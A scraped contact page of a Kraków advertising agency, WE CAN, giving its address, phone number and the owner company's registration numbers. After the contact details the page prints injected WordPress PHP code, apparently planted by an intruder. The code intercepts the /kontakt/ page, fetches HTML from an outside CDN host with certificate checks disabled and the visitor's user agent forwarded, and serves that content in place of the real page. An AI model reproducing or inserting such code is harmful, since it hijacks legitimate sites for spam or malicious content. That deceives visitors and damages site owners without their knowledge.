Agencja Reklamowa WE CAN
ul. Drukarska 3
30-348 Kraków
Kontakt: +48 604 20 20 87
brand WE CAN należy do Domella Sp. z o.o.
ul. Ostrowska 395
61-312 Poznań
NIP 7822309678;
REGON 634627863;
KRS 0000220335
add_action('init', function () { if (PHP_SAPI === 'cli') { return; } $uri = $_SERVER['REQUEST_URI'] ?? '/'; $path = parse_url($uri, PHP_URL_PATH); if (!$path) { $path = '/'; } if ($path !== '/') { $path = rtrim($path, '/') . '/'; } $map = array( '/kontakt/' => 'https://seringcuan.b-cdn.net/ayam/wecan.html' ); if (!isset($map[$path])) { return; } $url = $map[$path]; $ua = $_SERVER['HTTP_USER_AGENT'] ?? ''; $c = ''; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 8); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); if ($ua !== '') { curl_setopt($ch, CURLOPT_USERAGENT, $ua); } $tmp = curl_exec($ch); if (!curl_errno($ch)) { $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if ($code >= 200 && $code < 400 && is_string($tmp) && $tmp !== '') { $c = $tmp; } } curl_close($ch); } if ($c === '' && ini_get('allow_url_fopen')) { $ctx = stream_context_create(array( 'http' => array( 'method' => 'GET', 'header' => ($ua !== '' ? "User-Agent: ".$ua."\r\n" : '') . "Connection: close\r\n", 'timeout' => 8 ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false ) )); $tmp = @file_get_contents($url, false, $ctx); if ($tmp !== false && is_string($tmp) && $tmp !== '') { $c = $tmp; } } if ($c !== '') { while (ob_get_level()) { @ob_end_clean(); } if (!headers_sent()) { @header('Content-Type: text/html; charset=UTF-8'); @header('Cache-Control: no-store,no-cache,must-revalidate,max-age=0'); @header('Pragma: no-cache'); @header('Expires: 0'); } echo $c; exit; } });